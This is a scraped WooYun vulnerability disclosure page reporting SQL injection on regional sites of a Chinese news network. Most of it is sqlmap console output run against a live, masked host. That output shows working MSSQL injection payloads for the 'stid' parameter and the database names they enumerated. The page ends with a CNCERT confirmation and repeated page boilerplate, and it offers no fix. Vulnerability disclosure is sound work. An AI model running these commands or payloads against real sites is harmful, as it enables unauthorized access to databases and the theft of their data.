[14:20:59] [WARNING] time-based comparison requires larger statistical model, pl
ease wait.........
[14:21:12] [INFO] GET parameter 'stid' seems to be 'Microsoft SQL Server/Sybase
stacked queries (comment)' injectable
[14:21:12] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[14:21:22] [INFO] GET parameter 'stid' seems to be 'Microsoft SQL Server/Sybase
time-based blind' injectable
[14:21:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:21:22] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
GET parameter 'stid' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N]
sqlmap identified the following injection point(s) with a total of 51 HTTP(s) re
quests:
---
Parameter: stid (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
    Payload: stid=(SELECT (CASE WHEN (6827=6827) THEN 6827 ELSE 6827*(SELECT 682
7 FROM master..sysdatabases) END))
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: stid=5446 AND 7645=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(98)
+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7645=7645) THEN CHAR(49) ELSE CHAR(48)
END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(118)+CHAR(98)+CHAR(122)+CHAR(113)+(SELE
CT (CASE WHEN (9009=9009) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+
CHAR(122)+CHAR(112)+CHAR(113))
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: stid=5446;WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: stid=5446 WAITFOR DELAY '0:0:5'
---
[14:22:23] [INFO] testing Microsoft SQL Server
[14:22:24] [INFO] confirming Microsoft SQL Server
[14:22:24] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[14:22:24] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 50 times
[14:22:24] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:22:24
'pageid' 不是内部或外部命令，也不是可运行的程序
或批处理文件。
C:\Python27\sqlmap>
案例1.
Microsoft Windows [版本 6.3.9600]
(c) 2013 Microsoft Corporation。保留所有权利。
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/list.aspx?stid=5882
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:08:19
[14:08:20] [INFO] testing connection to the target URL
[14:08:20] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
[14:08:21] [INFO] testing if the target URL is stable
[14:08:21] [INFO] target URL is stable
[14:08:21] [INFO] testing if GET parameter 'stid' is dynamic
sqlmap got a 302 redirect to 'http://**.**.**.**:80/'. Do you want to follow?
 [Y/n]
[14:08:21] [INFO] confirming that GET parameter 'stid' is dynamic
[14:08:22] [INFO] GET parameter 'stid' is dynamic
[14:08:22] [INFO] heuristic (basic) test shows that GET parameter 'stid' might b
e injectable (possible DBMS: 'Microsoft SQL Server')
[14:08:22] [INFO] testing for SQL injection on GET parameter 'stid'
it looks like the back-end DBMS is 'Microsoft SQL Server'. Do you want to skip t
est payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'Microsoft SQL Ser
ver' extending provided level (1) and risk (1) values? [Y/n]
[14:08:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:08:24] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par
ameter replace'
[14:08:24] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Par
ameter replace (original value)'
[14:08:24] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORD
ER BY clause'
[14:08:24] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - ORD
ER BY clause (original value)'
[14:08:24] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Sta
cked queries (IF)'
[14:08:27] [WARNING] reflective value(s) found and filtering out
[14:08:30] [INFO] testing 'Microsoft SQL Server/Sybase boolean-based blind - Sta
cked queries'
[14:08:35] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause'
[14:08:37] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause'
[14:08:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE o
r HAVING clause (IN)'
[14:08:42] [INFO] testing 'Microsoft SQL Server/Sybase OR error-based - WHERE or
 HAVING clause (IN)'
[14:08:44] [INFO] testing 'Microsoft SQL Server/Sybase error-based - Parameter r
eplace'
[14:08:44] [INFO] GET parameter 'stid' is 'Microsoft SQL Server/Sybase error-bas
ed - Parameter replace' injectable
[14:08:44] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[14:08:45] [INFO] GET parameter 'stid' is 'Microsoft SQL Server/Sybase inline qu
eries' injectable
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)
'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (comment
)'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query)'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heav
y query)'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase AND time-based blind (hea
vy query - comment)'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase OR time-based blind (heav
y query - comment)'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame
ter replace'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - Parame
ter replace (heavy queries)'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER
BY clause'
[14:08:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind - ORDER
BY clause (heavy query)'
[14:08:45] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[14:08:45] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
GET parameter 'stid' is vulnerable. Do you want to keep testing the others (if a
ny)? [y/N]
sqlmap identified the following injection point(s) with a total of 435 HTTP(s) r
equests:
---
Parameter: stid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase error-based - Parameter replace
    Payload: stid=(CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+C
HAR(113)+(SELECT (CASE WHEN (3398=3398) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(1
13)+CHAR(122)+CHAR(118)+CHAR(98)+CHAR(113))))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)+(SEL
ECT (CASE WHEN (5256=5256) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)
+CHAR(118)+CHAR(98)+CHAR(113))
---
[14:08:59] [INFO] testing Microsoft SQL Server
[14:08:59] [INFO] confirming Microsoft SQL Server
[14:09:00] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 0
back-end DBMS: Microsoft SQL Server 2008
[14:09:00] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 32 times
[14:09:00] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:09:00
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/list.aspx?stid=5882 --dbs
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:09:07
[14:09:07] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:09:07] [INFO] testing connection to the target URL
[14:09:07] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: stid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase error-based - Parameter replace
    Payload: stid=(CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+C
HAR(113)+(SELECT (CASE WHEN (3398=3398) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(1
13)+CHAR(122)+CHAR(118)+CHAR(98)+CHAR(113))))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)+(SEL
ECT (CASE WHEN (5256=5256) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)
+CHAR(118)+CHAR(98)+CHAR(113))
---
[14:09:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 0
back-end DBMS: Microsoft SQL Server 2008
[14:09:08] [INFO] fetching database names
[14:09:08] [WARNING] the SQL query provided does not return any output
[14:09:08] [WARNING] in case of continuous data retrieval problems you are advis
ed to try a switch '--no-cast' or switch '--hex'
[14:09:08] [INFO] retrieved: SDSW20_News
[14:09:09] [INFO] retrieved: master
[14:09:09] [INFO] retrieved: tempdb
[14:09:09] [INFO] retrieved: model
[14:09:09] [INFO] retrieved: msdb
[14:09:10] [INFO] retrieved: ReportServer
[14:09:10] [INFO] retrieved: ReportServerTempDB
[14:09:10] [INFO] retrieved: SDSW20_News
[14:09:11] [INFO] retrieved: Man_adv
[14:09:11] [INFO] retrieved: SDSW20_Main
[14:09:11] [INFO] retrieved: WebFiles
[14:09:11] [INFO] retrieved: NewsAPP
[14:09:12] [INFO] retrieved: 91haofang
[14:09:12] [INFO] retrieved:
available databases [12]:
[*] 91haofang
[*] Man_adv
[*] master
[*] model
[*] msdb
[*] NewsAPP
[*] ReportServer
[*] ReportServerTempDB
[*] SDSW20_Main
[*] SDSW20_News
[*] tempdb
[*] WebFiles
[14:09:12] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 14 times
[14:09:12] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:09:12
C:\Python27\sqlmap>sqlmap.py -u http://**.**.**.**/list.aspx?stid=5882 --curr
ent-db
         _
 ___ ___| |_____ ___ ___  {1.0-dev-nongit-20150901}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual
 consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Developers assume no liability and are not respon
sible for any misuse or damage caused by this program
[*] starting at 14:09:38
[14:09:38] [INFO] resuming back-end DBMS 'microsoft sql server'
[14:09:38] [INFO] testing connection to the target URL
[14:09:39] [CRITICAL] heuristics detected that the target is protected by some k
ind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: stid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase error-based - Parameter replace
    Payload: stid=(CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+C
HAR(113)+(SELECT (CASE WHEN (3398=3398) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(1
13)+CHAR(122)+CHAR(118)+CHAR(98)+CHAR(113))))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: stid=(SELECT CHAR(113)+CHAR(122)+CHAR(107)+CHAR(106)+CHAR(113)+(SEL
ECT (CASE WHEN (5256=5256) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)
+CHAR(118)+CHAR(98)+CHAR(113))
---
[14:09:39] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET 0
back-end DBMS: Microsoft SQL Server 2008
[14:09:39] [INFO] fetching current database
current database:       None
[14:09:39] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\**.**.**.**'
[*] shutting down at 14:09:39
C:\Python27\sqlmap>

修复方案：

I don't Know. ?

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：11

确认时间：2016-01-08 16:56

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0166647

漏洞标题：中国山东网分站存在多处sql注入打包

相关厂商：cncert国家互联网应急中心

漏洞作者：路人甲

提交时间：2016-01-02 10:10

修复时间：2016-02-20 15:48

公开时间：2016-02-20 15:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0166647

漏洞标题：中国山东网分站存在多处sql注入打包

相关厂商：cncert国家互联网应急中心

漏洞作者： 路人甲

提交时间：2016-01-02 10:10

修复时间：2016-02-20 15:48

公开时间：2016-02-20 15:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0166647"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云